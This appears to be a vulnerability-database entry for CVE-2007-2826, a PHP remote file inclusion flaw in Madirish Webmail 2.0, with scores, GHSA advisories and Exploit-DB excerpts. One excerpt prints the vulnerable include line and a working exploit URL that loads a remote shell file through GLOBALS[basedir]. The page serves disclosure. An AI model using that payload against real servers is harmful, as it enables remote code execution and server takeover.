CVE-2007-2826
published 2007-05-22
CVE-2007-2826: PHP remote file inclusion vulnerability in lib/addressbook.php in Madirish Webmail 2.0 allows remote attackers to execute arbitrary PHP code via a URL in the…
Priority P3 · 45 · high · 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 3.26% (86.8th percentile)
PHP remote file inclusion vulnerability in lib/addressbook.php in Madirish Webmail 2.0 allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[basedir] parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| madirish_webmail | madirish_webmail | — | — |
GHSA
GHSA-hvjc-v463-hr2w: Multiple PHP remote file inclusion vulnerabilities in Madirish Webmail 2
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-3058 [HIGH] GHSA-hvjc-v463-hr2w: Multiple PHP remote file inclusion vulnerabilities in Madirish Webmail 2
Multiple PHP remote file inclusion vulnerabilities in Madirish Webmail 2.0 allow remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[basedir] parameter to (1) calendar.php, (2) compose.php, and (3) index.php, different vectors than CVE-2007-2826. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
GHSA
GHSA-rcgq-m943-xxx6: PHP remote file inclusion vulnerability in lib/addressbook
ghsa_unreviewed·2022-05-01
CVE-2007-2826 [HIGH] CWE-94 GHSA-rcgq-m943-xxx6: PHP remote file inclusion vulnerability in lib/addressbook
PHP remote file inclusion vulnerability in lib/addressbook.php in Madirish Webmail 2.0 allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[basedir] parameter.
No detection rules found.
Exploit-DB
Madirish Webmail 2.01 - 'baseDir' Local/Remote File Inclusion
exploitdb·2010-04-24
CVE-2007-2826 Madirish Webmail 2.01 - 'baseDir' Local/Remote File Inclusion
---
Madirish Webmail 2.01 (basedir) RFI/LFI Vulnerability
I'm eidelweiss member from Inj3ct0r Team
Download: http://sourceforge.net/projects/madirishwebmail/files/madirish_webmail/2.01/Madirish_W
Exploit-DB
Madirish Webmail 2.0 - 'addressbook.php' Remote File Inclusion
exploitdb·2007-06-04
CVE-2007-2826 Madirish Webmail 2.0 - 'addressbook.php' Remote File Inclusion
---
###########################################################
Madirish Webmail v2.0 Remote File Include Vulnerabilities
Author : BoZKuRTSeRDaR
Contact MSN:[email protected]
My Homepage :WwW.Turkmilliyetcileri.OrG
script Download : http://sourceforge.net/projects/madirishwebmail
###############################################################################
code:
require_once($GLOBALS['basedir']."lib/sql.php")
exploit:
http://www.example.com/[patch]lib/addressbook.php?GLOBALS[basedir]=shell.txt?
# milw0rm.com [2007-06-04]
No writeups or analysis indexed.
http://osvdb.org/36802
http://secunia.com/advisories/25475
http://securityreason.com/securityalert/2718
http://www.securityfocus.com/bid/24059
https://www.exploit-db.com/exploits/4031
2007-05-22
Published